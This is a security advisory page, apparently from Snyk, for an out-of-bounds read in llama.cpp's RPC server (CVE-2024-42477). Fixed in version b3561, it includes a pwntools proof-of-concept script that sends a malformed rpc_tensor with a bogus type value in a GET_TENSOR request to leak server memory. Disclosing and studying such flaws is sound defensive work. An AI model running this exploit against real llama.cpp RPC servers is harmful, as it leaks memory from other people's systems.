Out-of-bounds Read Affecting ggerganov/llama.cpp package, versions [,b3561)
Threat Intelligence
Exploit Maturity
Proof of concept
EPSS
0.05% (19th
percentile)
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-UNMANAGED-GGERGANOVLLAMACPP-7676289
- published 13 Aug 2024
- disclosed 12 Aug 2024
- credit 7resp4ss
Introduced: 12 Aug 2024
CVE-2024-42477 Open this link in a new tabHow to fix?
Upgrade ggerganov/llama.cpp to version b3561 or higher.
Overview
Affected versions of this package are vulnerable to Out-of-bounds Read via the rpc_tensor structure. An attacker can cause memory data leakage by exploiting the unsafe type member.
PoC
from pwn import *
ALLOC_BUFFER = 0
GET_ALIGNMENT = 1
GET_MAX_SIZE = 2
BUFFER_GET_BASE = 3
FREE_BUFFER = 4
BUFFER_CLEAR = 5
SET_TENSOR = 6
GET_TENSOR = 7
COPY_TENSOR = 8
GRAPH_COMPUTE = 9
GET_DEVICE_MEMORY = 10
context(arch='amd64',log_level = 'debug')
p = remote("127.0.0.1",50052)
pd = b''
rpc_tensor_pd = flat(
{
0: [
0x1, # id
p32(0x100), # type
p64(0xdeadbeef), # buffer
[ # ne
p32(0xdeadbeef),
p32(0xdeadbeef),
p32(0xdeadbeef),
p32(0xdeadbeef),
],
[ # nb
p32(1),
p32(1),
p32(1),
p32(1),
],
p32(0), # op
[p32(0)] * 16, # op_params (corrected from 8 to 16)
p32(0), # flags
[p64(0)] * 10, # src
p64(0), # view_src
p64(0), # view_offs
p64(0xdeadbeef), # data
'a' * 64, # name
'x' * 4 # padding
],
}
)
cmd = p8(GET_TENSOR)
content = flat(
{
0: rpc_tensor_pd + p64(0) + p64(0x100)
}
)
input_size = p64(len(content))
pd+= cmd + input_size + content
p.send(pd)
p.recvall(timeout=1)
p.close()